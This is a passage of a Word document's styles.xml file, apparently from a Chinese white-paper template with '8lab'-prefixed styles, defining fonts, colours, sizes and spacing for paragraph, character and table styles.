    <w:link w:val="af"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char5">
    <w:name w:val="8lab-图标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-b"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-c">
    <w:name w:val="8lab-图样式"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="8lab-Char6"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after="100"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="18"/>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Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>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font8">
    <w:name w:val="font8"/>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font9">
    <w:name w:val="font9"/>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left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>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color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>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Cs w:val="21"/>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ourier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="4444CC"/>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Cs w:val="21"/>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kern w:val="0"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:left="300"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="4444CC"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af6">
    <w:name w:val="表列头"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0">
    <w:name w:val="表  0 字符"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="configmarkupelementdesc">
    <w:name w:val="configmarkupelementdesc"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:left="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af7">
    <w:name w:val="说明文字"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="b1">
    <w:name w:val="b1"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF0000"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m1">
    <w:name w:val="m1"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pi1">
    <w:name w:val="pi1"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="t1">
    <w:name w:val="t1"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="990000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char6">
    <w:name w:val="8lab-图样式 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-c"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-d">
    <w:name w:val="8lab-文档封面标题"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="8lab-Char7"/>
    <w:qFormat/>
    <w:rsid w:val="001F0910"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char7">
    <w:name w:val="8lab-文档封面标题 Char"/>
    <w:basedOn w:val="Char8"/>
    <w:link w:val="8lab-d"/>
    <w:qFormat/>
    <w:rsid w:val="001F0910"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-e">
    <w:name w:val="8lab-注意事项"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="8lab-Char8"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:afterLines="100" w:after="100" w:line="400" w:lineRule="exact"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char7">
    <w:name w:val="脚注文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="css-7yxqiz">
    <w:name w:val="css-7yxqiz"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="css-wazei9">
    <w:name w:val="css-wazei9"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="css-35ezg3">
    <w:name w:val="css-35ezg3"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="日期 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="列表段落1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="200"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="微软雅黑" w:hAnsi="Tahoma" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="无间隔1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="微软雅黑" w:hAnsi="Tahoma"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="正文缩进 Char"/>
    <w:link w:val="a3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="未处理的提及1"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="未处理的提及2"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC10">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1">
    <w:name w:val="未处理的提及3"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="未处理的提及4"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="未处理的提及5"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char8">
    <w:name w:val="8lab-注意事项 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-e"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="FF0000"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af8">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Charb"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="180" w:after="180"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Charb">
    <w:name w:val="正文文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af8"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="-30">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="62"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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character" w:styleId="af9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afa">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-4">
    <w:name w:val="8lab-4级"/>
    <w:basedOn w:val="-3"/>
    <w:link w:val="8lab-4Char"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
      </w:numPr>
      <w:adjustRightInd/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-4Char">
    <w:name w:val="8lab-4级 Char"/>
    <w:basedOn w:val="4Char"/>
    <w:link w:val="8lab-4"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="修订1"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="-31">
    <w:name w:val="浅色网格 - 强调文字颜色 31"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="62"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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character" w:styleId="afc">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-7-">
    <w:name w:val="白皮书-7-表格文字"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="10293D"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-9-0-">
    <w:name w:val="白皮书-9-0-参考/引用"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="10293D"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-9-1-">
    <w:name w:val="白皮书-9-1-代码"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>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3F3F3"/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="10293D"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="5-11">
    <w:name w:val="网格表 5 深色 - 着色 11"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="50"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roma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网格表 4 - 着色 11"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="49"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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51">
    <w:name w:val="网格表 4 - 着色 51"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="49"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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
    <w:name w:val="TableGrid"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="15">
    <w:name w:val="书目1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="37"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:widowControl/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="bjh-p">
    <w:name w:val="bjh-p"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FirstParagraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="af8"/>
    <w:next w:val="af8"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ImageCaption">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="a4"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="120"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CaptionedFigure">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl/>
      <w:spacing w:after="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="22">
    <w:name w:val="修订2"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32">
    <w:name w:val="修订3"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-f">
    <w:name w:val="8lab-正文 字符"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00895A44"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num2z0">
    <w:name w:val="WW8Num2z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num4z1">
    <w:name w:val="WW8Num4z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z0">
    <w:name w:val="WW8Num5z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z1">
    <w:name w:val="WW8Num5z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z2">
    <w:name w:val="WW8Num5z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z3">
    <w:name w:val="WW8Num5z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z4">
    <w:name w:val="WW8Num5z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z0">
    <w:name w:val="WW8Num7z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z1">
    <w:name w:val="WW8Num7z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z2">
    <w:name w:val="WW8Num7z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z3">
    <w:name w:val="WW8Num7z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z4">
    <w:name w:val="WW8Num7z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num9z0">
    <w:name w:val="WW8Num9z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
